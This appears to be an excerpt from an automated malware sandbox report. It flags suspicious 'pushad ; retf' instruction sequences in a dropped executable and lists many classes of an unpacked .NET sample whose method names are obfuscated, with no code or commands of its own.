Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Code function: 5_2_00007FF848F12C98 pushad ; retf	5_2_00007FF848F12CC1
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Code function: 5_2_00007FF848F12CA8 pushad ; retf	5_2_00007FF848F12CC1
Source: C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe	Code function: 5_2_00007FF848F12CB8 pushad ; retf	5_2_00007FF848F12CC1

Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, SWVOASpCLLhQgfVK0es.cs	High entropy of concatenated method names: 'O2L5pwdJC4', 'Y3555a1ZRU', 'QK75DfDaio', 'IY5exGlRUPd5TSXFqL5', 'Dtvk01li6Aneyj7i2oq', 'EisWn0lD6cxHrshWLkC', 'RU4rUnlFZqN4AJ1MNu8', 'mauJAMl5C91ccZrY7Lf', 'OgSucnl8jZwu9ODS3Sj', 'nw0hfEldVdxO7RvHL51'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, KBuS5nppxY7MXFU11E6.cs	High entropy of concatenated method names: 'tO4', 'YZ8', '_4kf', 'G9C', 'DASH6Zrbmw90e2ufnZF', 'NrP0Tvroh0XxV4vhxbE', 'a4oH2nrMJ9GKOiUv38j', 'W9KaPyrUqrbDRb4Q3qo', 'SynGQjr7PIAtKKLHEpH', 'igK8kFrt3Fe7HI3q3Ko'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, GpQliVvqDsGkgqcvtKE.cs	High entropy of concatenated method names: 'P2C6scv8bG', 'v3d6HSmQ65', 'mbj6O5Lw3x', 'PXW6tjNASi', 'hJY6aWsy0J', 'QOFsTinbExTmYTTtGFk', 'xEFTGTnSfoeYdLdk6xR', 'OKghgInxawrJSy9vmTP', 'k6oPBGnoVc4GftPeRrU', 'yFphRunM2wuDNd5W6Fl'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, IP6dugD1KqQB08GlBWO.cs	High entropy of concatenated method names: 'FbP0sO55RA', 'h790HGyI3A', 'yGM0O5NKkS', 'TSCaE2MBhZ9qjZTlkY4', 'MpXhDAM3u5aaCL8fLov', 'g2FoyWMOFba5q8ywmHk', 'WxVyDJM6q784NA7OOSw', 'YZt0k1RMAv', 'cKW02Qke6D', 'd5f0XmgrjQ'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, mXWc4bRIL6R5s6Hd24.cs	High entropy of concatenated method names: '_66K', 'YZ8', 'O46', 'G9C', 'Lnx6NNT9U55ThfDL3vV', 'BxYWmJTwKGn2sB6ax8P', 'nCu0WsT3BbWCDYevS2I', 'vLlKBiTO3gADrsRwWWA', 'e9klBxTBM7toirh9xTX', 'AqF74VT6Z3gp7sMj9Ev'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, BiJX6qDrCNv4BQ2wwpD.cs	High entropy of concatenated method names: 'rAgeMBg35r', 'yHqesT2QZg', 'en2VwT7xeCPEDGaevJr', 'KioCkc7bypGKUnXWNEa', 'oxEA867NQiNupcJX4uZ', 'dqLq0Y7SRfx2dkmF3WZ', 'xVFTkd7oG9Mq00E3b8f', 'tWjKDx7MrUPZFYmGtnM'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, RVSwGLveaZ9Q5BJ1bYF.cs	High entropy of concatenated method names: 'uxk', 'q7W', '_327', '_958', '_4Oz', 'r6z', 'r7o', 'Z83', 'L5N', 'VTw'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, CNYKbp5njKbbVhDOh4M.cs	High entropy of concatenated method names: 'rJpDzo8u4H', 'uJHvlxithZ', 'Yx6vpLFaq4', 'JkYv5W2ylV', 'cqZvDGWKE3', 'DayvvKXTo8', 'jtgvZfAxoW', 'tIAvVIHF7u', 'WQlvmWPVjS', 'OgEv06MS1l'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, hVAn4CV8EAUK2CjAQs6.cs	High entropy of concatenated method names: 'yhKfc7M2xl', 'Hyxf7oD0tq', 'DRxf8rOUQk', 'OXMfy9mhia', 'cJGfPR1RP6', 'RBQCyspyLJTQw3KgQAO', 'dfHkfypk0CVrrRDGVs6', 'snyeHfpuyXi1tAMZf5k', 'nbjBeTpzxFf8M1QljQc', 'dq9veS0XnNXoFIvklTP'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, AFZUcfVoHLbfhDyIDC7.cs	High entropy of concatenated method names: 'PJ1', 'jo3', 'LWhBeijCes', 'E2hB1AvXTP', 'v3ZBKVSH4C', 'EC9', '_74a', '_8pl', '_27D', '_524'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, lUgdsYpE3sAgd7VHt2o.cs	High entropy of concatenated method names: 'YbIpBL6R5s', 'GeHYQUHS7a2wCHOmbth', 'GOXvhWHxyaiFpcggd9L', 'qA7nrWHGlpDRaCihwop', 'J4teZGHNTFrM1Wb8rKP', 'wGpkvhHbGrlJk19oJqU', 'f2YpvPHo23AotM9tlmW', 'QQSWT3HMbuNOkn6Dns7', 'hm1L8nHURCWyqVns7wP', 'f28'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, HCm4exvGtfWQDjNiNb2.cs	High entropy of concatenated method names: 'nHCQO4A9ST', 'IcaQtMpVsv', 'i6wQa75yE4', 'QfeQ9xFAMZ', 'utOQAeE0XE', 'iUbXxv2uBfJTmcZaQCM', 'nPYl9w2zBHfLsbyMX1I', 'FWX1Xa2yUlDs0RvOa7f', 'HTOH1X2kqHUkaNK55Mu', 'GL5aLXPXK6xbhfU2fFt'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, pF7TfKpN9QCkGqmIWBC.cs	High entropy of concatenated method names: 'GvP', 'YZ8', 'bp6', 'G9C', 'JrSyYWjCai9wjm1PDND', 'KPbRGgjg55MERITGjTt', 'AxvcgLjhuY2JQr8I2k8', 'DirQfnjEto3e4g5JyR7', 'RigcwgjpUKt9KXHIWV5', 'qVpK7sj0t4wjup7E8YX'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, ndbmf2DoyHk6INVrFne.cs	High entropy of concatenated method names: '_5u9', 'uNpvjbfK8R', 'Cl21lmc8kQ', 'fOAvdEnFs0', 'NNIlWn7ySOkerXxGtsV', 'gf5DGx7kJfMQN8L48vP', 'ge2YC07uM4dT81Jbpdq', 'rNQ5pl78wflH4LO4FLK', 'He7dJI7dkTyAUU2sIU5', 'pK8VJ27zaKmjg4v6Nfn'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, wAcUSUDELR6kZtl0aTO.cs	High entropy of concatenated method names: 'uFRekgwCKC', 'F6be2LYXcb', 'JPJeXqSMyc', 'zKNyF9ULnwGNQtbV9hV', 'XuJFZmU0f7srcD7aqQK', 'BcW3iRUqgDdAEL5pngy', 'LlIhOCUWLtFQoRGLJQI', 'ShWeVXNPUc', 'eYremnyxka', 'B73e0L0Fyc'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, LgPBEn54VjfgUpWUtXY.cs	High entropy of concatenated method names: 'oM3mg7paWf', 'mtqLqcxFddk72tC9Rxo', 'iIm1vtx134SBBIqrRGU', 'm7vIX7xDfi3Dc6jjsZM', 'WZ4iZvxR3Bynq2uEKXA', 'GnghJAxi5r12LldUlrG', 'zH2mn1DdNs', 'IXImErkMBG', 'uHTmcOWIm8', 'Jakm7wpbkc'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, qssPt6xj1vXo8CRgYX.cs	High entropy of concatenated method names: 'kcq', 'YZ8', '_4bQ', 'G9C', 'DboOlimrsCiK5OdDstH', 'qdZ08bmY7SWIVdySBIi', 'IRLZKnmHDD3MVUXJvF9', 'hNLC8Qmj802M7Zp7iEY', 'NVEi4CmlHlmstXHA7vB', 'kFSIi1m90MpqUn9w1oY'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, wedCfLZ90pRJC9WXeDp.cs	High entropy of concatenated method names: 'HiXVHmhmFpcYPJmQUCF', 'eDnTG9hrrEiHZdIpZb6', 'V7sMPqhe3iG5iYEk6YV', 'ibD1ZGhTe4kWOqBYfVA', 'Ha0gVXhYPvfGdG3YWJo', 'Ac7CN8hHy0mBkvD7A1E', 'SSaj7Khjqj5dlYZptBV'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, sACnUdZF29J05M10KAq.cs	High entropy of concatenated method names: 'F2MgvbAnBM', 'Q2JgZ0LHe1', 'ziwgVH2hJU', 'gsugmKq33o', 'aKxg0l6sN0', 'eCpgemxxsP', 'JqJg1OJJGV', 'CX7gKTKwkl', 'gsagQ9Harj', 'LP8gGsisx5'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, pOZKkWyhWpmtsZvjGE.cs	High entropy of concatenated method names: 'tfUrL9NBm', 'AFugHL0MN', 'WTYfOyuu9', 'e9tq0wnsS', 'DrKS6QCaM', 'xLnNUNMOk', 'CSFBck4f4', 'YkylHn4HYXrjTX4sXeV', 'Lmyio34jD4SKhfUiTi4', 'i40Vay4lmCyvr2kcpSn'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, SiF90EpPJmptZ8m1LyY.cs	High entropy of concatenated method names: 'kNf', 'YZ8', 'U31', 'G9C', 'M9msAjHZGX9dbiUnkMq', 'kDu0dwHCoPjNuVYW3se', 'PN5MflHgOhw5IUmmFPm', 'Ra1HRqHhU0I2jAda4Dd', 'lqQNyMHE3hmElBQLSdi', 'YnxammHpgHZnFuldFF1'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, qSnq8l5X3vX3REE3MGY.cs	High entropy of concatenated method names: 'u8uD39qkQm', 'RcjD4g7ObE', 'pABFeTBbwvCpQASIfcp', 'rDt7PQBo7IJaGZHm1WL', 'lm631OBMEDA2AnuNy7k', 'uhjeQtBUrk1r29f3PjZ', 'tPorKFB7q1rmjUiaUhj', 'uVGZdHBtuWt5K2j0Air', 'yXgunFBvfdDmgggEh8m', 'fTYuDUB27UTqs20q3DA'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, HLBOGXDvhp8FKCk3hkp.cs	High entropy of concatenated method names: 'SISmR1Q8vj', 'BODmikEh0d', 'Hnfmo7mBll', 'swUmTuMs4u', 'bAamUa61y9', 'DwdmhdO1c0', 'NPwHbFbIu2PcgqqVAyZ', 'at1NJJbnw1pt55WL1I1', 'yLo1j9bfFXus3EnscQF', 'bnNxC3bAMwftPnBB64q'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, t4bY7uLsbYBGU4UJ2w.cs	High entropy of concatenated method names: '_52Y', 'YZ8', 'Eg4', 'G9C', 'cRWAWAQg8', 'bVl4l7KbU4AoJiTN19r', 'sPadTwKovPNod6dTfRO', 'D0kx5aKM9M0NWjLjQyb', 'qFuxrDKUPj2fqoPX870', 'Au750jK7aBR8KnbUROB'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, QylHNYpq3EJI9gHsnII.cs	High entropy of concatenated method names: 'Ai7', 'YZ8', '_56U', 'G9C', 'yBVLcKHuaCuTaF1jI0n', 'vcYgLmHzL4e7PeoN5SN', 'EaWXQAjXRqSURGUMvBU', 'mk78g3j4Ex8ZRjDC30G', 'QcpUKFjKIiKGK7OjA2c', 'evxmy4jeEqTw8EFvU38'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, Vc0mWkDzkbg019P3hQ9.cs	High entropy of concatenated method names: 'gjd1SNHnUD', 'ANl1N1iBuo', 'og21BG2Isk', 'd1ot2Mv01iFL4auUWPk', 'iycIFyvqmDCJcv6oEQ7', 'vUPwyPvEXcIYsSX0BfB', 'PrnFp7vpkK0dRcWO1U4', 'WZEdXEvL8WEBXjVklH3', 'Pqpe8lvWWH3e2AwgxKW', 'pt6q46vJ5OoEIApRG0i'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, mQZhmwpYTkR9cGGCCuo.cs	High entropy of concatenated method names: 'OKMpT2eHRE', 'LVrokUlKsP60UFLXEtL', 'wFgWnolebILXx2ieMK6', 'GTsnaslXA4K493O2WBD', 'DU6SW6l4saFNPUZGRJV', 'bKiq5nlTGHgi8mFDZxh', 'VA9YEWlmm64Tn4n9fk5', 'qxha9ilrKJQkrQnR2xo', 'xlUphXFsPR', 'Ef31w9ljRPLouNHY5Cu'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, mVuxMxsOpDtfnAoLSC.cs	High entropy of concatenated method names: 'g25', 'YZ8', '_23T', 'G9C', 'qULixujE7', 'loiE7OKZJLiTwbY4iYR', 'tecP2qKChfpNMeKblsf', 'gsPMiZKgABiHZlAH5Ob', 'ScICdEKhoppPgcDmY2D', 'H7upvjKEbDTvqnYeTl1'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, HqXj5BmmYlIV5tcYQ6.cs	High entropy of concatenated method names: 'pj56BmYlI', 'RcoTVmaeAjZFg79XKg', 'fWpUNDQFjr9np1gLAv', 'QiJT3XcPVrc52G5Wko', 'cBYUp0s7JEFq9hBPgD', 'HrHY3MZ55lYA9VTdvt', 'aYj5dORgK', 'gLPDW2xqs', 'FRFvZJiEL', 'oQoZ4PMsv'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, MEVXLUoJYijBBiihfD.cs	High entropy of concatenated method names: '_468', 'YZ8', '_2M1', 'G9C', 'iRSmFXTSgl1nQtpyPTG', 'iJkyh0TxpJ3bs6wyJVY', 'MyY2ZgTbGdTcbc3dKC4', 'ainV9BToSP9F86uh7lV', 'DvuI3WTMl4oVdRKLXMm', 'bsPeGQTUmI2WNkeq5GN'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, mw75yEZ44hfexFAMZ8t.cs	High entropy of concatenated method names: 'im3gSIJ1La', 'TRDgNYBGiJ', 'F8e', 'bLw', 'U96', '_71a', 'O52', 'E5wgBdjtKI', '_5f9', 'A6Y'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, wIH1gljUXFsPRfOv2H.cs	High entropy of concatenated method names: '_8Ok', 'YZ8', 'InF', 'G9C', 'c4tpaGm6SdJlycL68DG', 'uh4AqSmGSKogJK27PcH', 'yjeN9xmNlL8YkCfklLv', 'tBmUw2mSJnDE7FFqVkF', 'w3sDPJmxNGAJvw00Q8u', 'y05m2gmbPtoySZlYwGu'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, QRinUQDuwKgJRBLPbKK.cs	High entropy of concatenated method names: 'MOIy1Xvga8esnkgucTr', 'R8SF04vh94TpaI7vZrr', 'R0AObQvZD6LgcSKSCwf', 'vj1xbRvCKp5kQekg4Ry', 'IWF', 'j72', 'XRL1XWW23e', 'Yoy1JRrZZn', 'j4z', 'Fxp1nQ8Nuu'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, rjNkZcmKMC0Wqb2QNse.cs	High entropy of concatenated method names: 'YA7HjSXXWyQ7Q', 'mIwRBSJ6C1DEhq1sEUw', 'pMRX2dJGEeLLx1Wm1aC', 'MmTyc4JNBdxMtocd11Y', 'VRJKc2JSsli1r23S6fC', 'BbogiuJxMT9LHHCEGXs', 'wm1LPdJOMefB9sFW7u5', 'pn6QHdJB30kh8ixbxbq', 'TFIXOxJbToT3tyVE2yj', 'Vt0LAZJodxopiVCHI0R'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, z59ATppjEF5Xfw5J88u.cs	High entropy of concatenated method names: '_7v4', 'YZ8', '_888', 'G9C', 'KhhFQ19cKhGsuBHUGKg', 'va7V6G9arap0oT725ka', 'qQFBou9s9UFIpISaZCj', 'CTlWxN9ZAlWrDs0CdNK', 'HbUedc9C9Wv3gefwO9j', 'xOfNUj9gKYyEOVIbtwG'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, qVATOWp2QvmVxxnytwd.cs	High entropy of concatenated method names: '_981', 'YZ8', 'd52', 'G9C', 'taNZ5UYiYG3MeKt7MCU', 'xs7TavY52B07lraVf8j', 'WmMNHgY83xMVKR0pTUP', 'WDdnvKYdoqps5s0jQ8R', 'FgxYx2Yyp481twBImPX', 'lhuqjrYkqnIwIXKK20m'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, g12DDVf41KAhqYCdGF.cs	High entropy of concatenated method names: 'CaKHSZEnv', 'RZ4Onfbm6', 'vaxtM0stN', 'clSjFr4hSGRGpCAoo9h', 'aC0Iog4Co26bKO3S5IT', 'upTGL14gpCtUcgbDC5y', 'P0ovoJ4EKMEYf81bsvk', 'lv3JSU4plhkVBWHYYlo', 'htWtTF4029BJKfh8AjM', 'Y4jh3H4qLwXJ1qvokoO'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, k8vCdMvuOPmuqOnA3dw.cs	High entropy of concatenated method names: 'uFIkggYqAr', 'DASkq771Q6', 'ur6k6EXAqN', 'QmMkI22Qcv', 'FbUkkb38j7', 'uo5k2NMaKm', 'D6KkXejWXF', 'Fb4kJI3ajW', 'RmAkn3mOhU', 'z0dkEs3Bqu'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, jCO1BDp8a2tIXikeZHN.cs	High entropy of concatenated method names: 'gHL', 'YZ8', 'vF9', 'G9C', 'NtWp3OHvQ1Tln8dcJOQ', 'v2gepGH2Mursqk3ZT37', 'UDGQL6HPtPOT1Rn1mNU', 'QbLMBtHnhW6mMBCcwqV', 'iTvSBHHf0A7CjlyddIn', 'UnfKrBHIpBW8LMlLBmt'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, r3LayKpuXTo8KtgfAxo.cs	High entropy of concatenated method names: 'kEe5ENHMGg', 'ADNc8gwrclxsobW7sXA', 'OwLtKwwYXQKXD8aThJU', 'jQOngVwTO6aUOMAQOHT', 'dv6YkPwmVTovK9l4krU', 'B9OKZuwHgDBZNnH1c17', '_5q7', 'YZ8', '_6kf', 'G9C'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, nXxlEyD2ur5c59HyTSg.cs	High entropy of concatenated method names: 'Vk80xdgd5X', 'tvJ0Wt8o4k', 'YZr0jGVMmc', 'UV3KWRMJZW4I6vrh2eG', 'KUAotPMVq6MdGgdkEnN', 'mZ0CEeM1LXhClwv3jji', 'I2CoDcMDJUnvoJPHUmO', 'O2JPldMFEAcAMAjsway', 'FpTCnHMR3GGc6tEd5Co', 'J9rhHwMinuVgPqGSEa7'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, m81yZcDUFoK9qwyJAt3.cs	High entropy of concatenated method names: 'oYo', '_1Z5', 'mBhvCNKVRK', 'uY01vx11TX', 'nKkvDPdjNq', 'eHiHgetOoEeuNS5S5eh', 'axJ0AZtBFJSJR9R3bro', 'EtZJAJt6y4rflCpNb0C', 'hAWeiLtGyA9VUGjrBtx', 'AWAviFtNG2PcutyriEx'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, zJTMOyVPcbMXXwOOQxy.cs	High entropy of concatenated method names: 'IGD', 'CV5', 'o4bfrMiQvU', '_3k4', 'elq', 'hlH', 'yc1', 'Y17', '_2QC', 'En1'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, J3gLuFSUWUpJlDHEfh.cs	High entropy of concatenated method names: 'T43', 'YZ8', '_56i', 'G9C', 'saOJieK9o1badYGfnWZ', 'XbPgu2KwTNMg6IyZE1F', 'YIPRrFK3OtVAjTeukHX', 'rGXZXkKOmhnQUsELtNj', 'vyFAPYKBEHRaXw3fS1N', 'EQP18jK6ogVY7k9sJrV'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, QWXNPUvXcZYrnyxkaN7.cs	High entropy of concatenated method names: 'h1EGviRTJc', 'DfkGZ53VWh', 'lNmGVr6t0d', 'mIa8mSPNMmPdWPVZTks', 'QHnHAfPSFBWZDJdPA19', 'tqTIDLP61T38IAmPIFp', 'tqyw5APGt20N86P0xp9', 'ItsOQLPxsVghKZaMeGi', 'ecHrGaPbWoVd9TYY46N', 'BDhJifPoV1lOaKKGVua'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, SaePPADb8b4Zt1RMAv5.cs	High entropy of concatenated method names: '_269', '_5E7', 'UiTvKkAvYd', 'Mz8', 'cegvL5dOev', 'rS8MKdtRc6la5EPiBCs', 'zv5C2NtiFJePZFD5yoI', 'YoDs2dt5koRohw6MKyv', 'GTYAOUt8Mc2tlbBJfTR', 'LJ51Ultdfgwcj4JmtuV'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, eEdNwZpgbBlSjQ1t6il.cs	High entropy of concatenated method names: 'p23', 'YZ8', 'Gog', 'G9C', 'DWy9KQHV9Pcssuk47mi', 'nhUREhH11DS9ZbdlOh0', 'KBNQaLHDETmI9O7W4br', 'bF3fmrHFhmI6EFJBt0W', 'pP6EDcHReNdw8MoQ6au', 'GxUmZ0HiyNMLhYISTe3'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, ejKpeNVN27XrU9xr3sW.cs	High entropy of concatenated method names: 'RqAqedx9nw', 'wwhq10rVed', 'oTGqKxuXBl', '_3Gf', '_4XH', '_3mv', '_684', '_555', 'Z9E', 'hDTqQhATDK'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, ctSP0Kmg0FrUTUtxJs4.cs	High entropy of concatenated method names: 'xCfLryC9bG', 'MbyLgkKCyp', 'Si1LfTsXWB', 'wEHLqpswR7', 'tmMLStIsTD', 'jMCLNPyj7G', 'RkeLBfxYrI', 'od2LYrX6KB', 'Nu9LL1my1x', 'aARLMp7a67'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, TpRxirDpMrDAByeiQ8F.cs	High entropy of concatenated method names: 's1ImB8lCly', 'uOImYCuaNW', 'V2kmLMwZLc', 'SRLmMiJuNn', 'KWlWX1xzQ90tll8hA5M', 'mKjinGxkQJQBSsA81ZM', 'eXBtFRxuGvAy9odJDqk', 'iDrZJ0bXVOKNrtGZLdc', 'U0sO0ub4Dv9erh6GuJc', 'q4x26sbKtQa9bqCmKeK'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, eeNAmcDRAqbhKuYk8HX.cs	High entropy of concatenated method names: 'sg9', 'X21vIYtyHp', 'rdte3CyShv', 'e1jvTbQhVn', 'g8opgh710HT5gyx9ant', 'kIXEbh7Dv6OAsM3aCZd', 'flOnyI7FE0yidC8IB4C', 'nlleoY7J6wgU6NedIu9', 'dRAQDg7VjYtXJDjhwW1', 'okxAEU7RmVLAj4PPiGO'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, WcWU1kVsHtKKfvMp9yD.cs	High entropy of concatenated method names: 'FZUNVNLTNwSk49RSu55', 'I33UsHLmm5ltrhJF1yD', 'kGAoRGLKM3pQpt3Yvt9', 'V7vjO1LeJaWMMuCRjw5', 'afJqHfFIDa', 'WM4', '_499', 'DFJqO2LrUn', 'E7YqtCb37C', 'uw6qa0JFTD'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, JbTpcHZMRy8TXA1ow7p.cs	High entropy of concatenated method names: 'DTtrdSY5Bn', 'nTwrbrZguL', 'PGhrF4sN9L', 'AjprumPcZ9', 'zFQrwQMyVw', 'GV8r3B9JBG', 'EQaKqOg1r5FOmB2Smas', 'tn0GOCgJUx7XbygeT1c', 'J8DocygVExkXtSRbTkc', 'JAh8gegDSKxx6YoP2X5'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, h0MFPwm6TZOLNcOO3SR.cs	High entropy of concatenated method names: 'onELw2JP3EvYcfmMNut', 'NElNBAJn1jbSqW1SHtU', 'M37EZ0JvD3KGfhNV4U4', 'RmPibAJ2TBYefmwsUw8', 'rpZLID61jZ', 'rlum8ZJAwAZxUKt6Nx1', 'HPCHckJQ5hnkdipdCaH', 'rIGT1IJcAvG5sjXr7ZD', 'vCxusIJa3qs1A0aYwcK', 'yoYasgJs2Zwi4Gf59Vq'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, DAVZtZVtIYHvqUGaxWA.cs	High entropy of concatenated method names: 'ayZNackA0H', 'yi5hrqLA9bC39cTAfjL', 'h6bgglLQsLZSnmjn9Bu', 'PVTIXtLfeAu58R0QJSi', 'ibKKEfLIUQgS2C05eWQ', '_1fi', 'fpPSj5ZwlY', '_676', 'IG9', 'mdP'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, lPvUHcVgrnES7pxNAs1.cs	High entropy of concatenated method names: '_7tu', '_8ge', 'DyU', '_58f', '_254', '_6Q3', '_7f4', 'B3I', '_75k', 'd4G'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, jCs6bLv7YXcb9PJqSMy.cs	High entropy of concatenated method names: 'buEGsAbrB9', 'MFjGHw6qJT', 'EOyGOcbMXX', 'WOOGtQxyKa', 'JL2GaO3V7f', 'BTT6IxPZhAD6OEppWM6', 'oiivPMPCKnfjaNeV1oa', 'tIOe3mPatguglqh2bH4', 'u5pPmkPs3i3BCbU5b9q', 'ei2ASMPg68r6IH0sVoD'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, pPJbV1bUEimFDX0Qeg.cs	High entropy of concatenated method names: 'pHw', 'YZ8', 'v2R', 'G9C', 'd6K8QWmfRL1YOPnJgR0', 'fGFdQamITa1pHJrAjJl', 'cN9p2TmAoXWT2N1n79A', 'cUdnQqmQGA2I7KgA6Xs', 'ttOSBVmcjh7TGsPkSXB', 'p8FSaKmaIgG4G7WZP8T'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, AJeb4tpatavKOEECWjf.cs	High entropy of concatenated method names: 'D8op3yV8oD', 'Er1HChlgkg7fgZ2v2v8', 'SS7kLclhpLmMRqDr9wX', 'MWdJCqlZti2oFu2SeiG', 'B4WvJAlCHT5KahKx0PV', 'ixh4bblE5TJOTM66kqf', '_3Xh', 'YZ8', '_123', 'G9C'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, Ofs5QNDx2vyb1hGHAXD.cs	High entropy of concatenated method names: '_9YY', '_57I', 'w51', 'EvfvN3sxlp', '_168', 'BflJret29QTsf8flLyO', 'wFMOrwtPUmWJbcednoS', 'GubUH7tnHFZ1ff07wa0', 'Gt0MXqtfWN67vQ9D1qw', 'Pk0yVmtIiuwiTEfr1FW'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, DPjmLiDITPCPQliPD0O.cs	High entropy of concatenated method names: 'rbh0i2jtcK', 'J0R0oOw6nk', 'aq20T3ERLg', 'RVS0UwGLaZ', 'ma9pUrMs3j1yemoOcAP', 'WmwSXQMZTEu2Po4gA1S', 'HjVrYhMCuekxRwpj8eH', 'GiPqokMclnQ3A1OEPnN', 'SWrxgoMaGsCAcUF6Qhw', 'Rl2KdjMgjmZ8VNcqnAd'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, TY7oH9aAEiOAnnv7tF.cs	High entropy of concatenated method names: '_59M', 'YZ8', '_1zA', 'G9C', 'FohnSAeCJUK5xtrodbB', 'FH1H4qeguWWjnIq8kQ9', 'Ph61Orehl3mOeJNajKC', 'jOp69CeEuXGSESw7JZd', 'tnZSCZepZfFkiStj9Zc', 'mTSdD3e0ANJm3rgbfgC'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, wXoK8QZwGL8bku33syP.cs	High entropy of concatenated method names: 'q4Y', '_71O', '_6H6', 'GktgPa5Im1', '_13H', 'I64', '_67a', '_71t', 'fEj', '_9OJ'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, K9COWI5AT2pn5DAJXfi.cs	High entropy of concatenated method names: 'w62V0OXvbd', 'sllVeTWOxH', 'NeVuTMS8E1dTFwPbIRG', 'sYXjcsSdowdv5OGBMbD', 'bvBlIeSivGsEthkMiHk', 'xD4PMAS5eWZyNomoMuO', 'xPBVXEnVjf', 'SBRljbxXVm0uJM6LNrr', 'TmyNHYx4O25EoRumx6V', 'e2qIbSSuAOuKPQik4Wv'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, a91byHDjAa50EG52shZ.cs	High entropy of concatenated method names: '_3VT', 'O5t', '_1W5', 'kDs1KV3gj9', 'AqmvXgRQcr', 'G021Q5VSC2', 'ryZvqF0a1t', 'p8bvc0thq0YK5FuLqLX', 'r6VTyRtEVcSly589ala', 'gc8CjVtCvJVnv2AkhrQ'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, rFitynpGStI8dKmLQQW.cs	High entropy of concatenated method names: 'd43', 'YZ8', 'g67', 'G9C', 'Q94lbbYnH8xO9fJlDtM', 'hwKYcFYfy1i1VHwtuBK', 'N632LfYIaM8WRbfOwQ6', 'qOKircYAu1dXQCmqRCD', 'VaU1rjYQiJcBUqjMTm3', 'cDRmgrYcWPKRveEQydp'
Source: 0.3.5Ixz5yVfS7.exe.73e9536.1.raw.unpack, J9Ts8wVVoFgZTMRvNOa.cs	High entropy of concatenated method names: 'Qkp', '_72e', 'R26', '_7w6', 'Awi', 'n73', 'cek', 'ro1', '_9j4', '_453'
